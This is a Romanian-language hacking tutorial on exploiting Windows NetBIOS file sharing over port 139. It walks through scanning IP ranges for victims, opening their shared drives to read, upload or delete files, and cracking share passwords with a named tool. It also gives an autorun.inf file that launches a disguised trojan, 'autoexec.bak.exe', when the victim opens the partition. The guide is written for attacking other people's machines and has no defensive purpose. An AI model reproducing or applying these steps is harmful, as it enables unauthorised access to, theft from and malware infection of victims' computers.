Hacking port 139 1. Ce este NetBIOS-ul.
2. NetBIOS in Windows.
3. Gasirea punctului slab.
4. Exploatarea punctului slab.
5. Cum treci de parola.
6. Cum poti determina un sistem de operare sa activeze optiunea de share pe toate partitiile sale.
____________________________________________________________________________________________________________________________
1 . NetBIOS (Network Basic Input/Output System) este un concept operational realizat de IBM si Sytek realizat pentru a indeplini rolul de API (Application
Programming Interface) pentru ca o aplicatie sa poata accesa resursele unei retele. Pe scurt NetBIOS permite aplicatiilor sa comunice cu o retea.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2. NetBIOS in Windows. Un computer poate fi accesat cu NetBIOS daca are deschis portul 139. Acest port (139) este cel mai periculos port de pe internet. Toate fisierele si imprimantele ce au pornita optiunea de share pe un sistem Windows ruleaza pe acest port. Aproximativ 10% din totalitatea utilizatorilor de Internet au hard disk-urile expuse prin intermediul acestui port. Portul acesta (139) este primul port la care vrea sa se conecteze un Hacker si tot acest port este cel blocat de un Firewall.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
3. Gasirea punctului slab. Pentru a gasi un computer vulnerabil trebuie sa scanati o retea sau o arie de IP-uri pentru a vedea care are portul 139 deschis. Pentru acest lucru recomand folosirea programului IPScan (acest program se poate gasi pe CD-ul nostru). Odata ce se termina scanarea si se gasesc IP-uri vulnerabile se trece la punctul 4.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
4. Exploatarea punctului slab. Dupa alegerea IP-ului vulnerabil se trece la conectarea cu acesta astfel:
START > RUN > In casuta de RUN se introduce comanda \xxx.xxx.xxx.xxx apoi se da clic pe OK.
ATENTIE xxx.xxx.xxx.xxx este IP-ul gasit de voi asa ca inlocuiti x-urile cu IP-ul gasit
Daca totul a mers bine ar trebui sa se deschida o fereastra cu continutul hard disk-ului victimei. Acum puteti vedea, realiza download sau uploade sau chiar sterge fisierele de pe computerul victimei.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
5. Cum treci de parola. Se poate intampla uneori ca computerul la care incerci sa te conectezi sa fie protejat de o parola. In acest caz trebuie sa folosesti programul PQwak (acest program se poate gasi pe CD-ul nostru). In acest program nu trebuie decat sa introduci IP-ul si numele de share. Numele de share este numele folder-ului care este protejat de parola. Dupa ce ati introdus aceste lucruri trebuie doar sa urmariti cum lucreaza PQwak.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
6. Cum poti determina un sistem de operare sa activeze optiunea de share pe toate partitiile sale. Daca partitia care are activata obtiunea de share este (C: D: etc.) atunci poti pune un troian care-ti poate oferi accesul la restul partitiilor si chiar la intregul computer. Pentru a realiza acest lucru trebuie creat un fisier ce va purta numele de autorun.inf Pentru a realiza acest fisier trebuie sa creati un fisier txt care sa contina urmatoarele:
---------------------------------------------------------------------------------------------------------------------------- ------------------------------------------
CELE SCRISE MAI JOS TREBUIESC COPIATE FARA MODIFICARI.
----------------------------------------------------------------------------------------------------------------------------- -----------------------------------------
[autorun]
open=autoexec.bak.exe
--------------------------------------------------------------------------------------------------------------- -------------------------------------------------------
Dupa care se salveaza fisierul txt modificandu-se extensia din .txt in .inf
Apoi cu ajutorul unui Troian (pe cd-ul nostru puteti gasi multe astfel de programe) se realizeaza un troian numit autoexec.bak.exe
Acum cand cele doua fisiere sunt gata trebuie sa le copiem in directorul principal adica in radacina. Spre exemplu daca avem acces la partitia C: atunci fisierele noastre vor fi copiate direct pe aceasta partitie fara sa fie puse in folder.
Acum nu trebuie decat sa asteptati ca victima sa acceseze partitia in care ati pus cele doua fisiere. Odata accesata acesta partitie troianul se va executa oferind acces la tot computerul.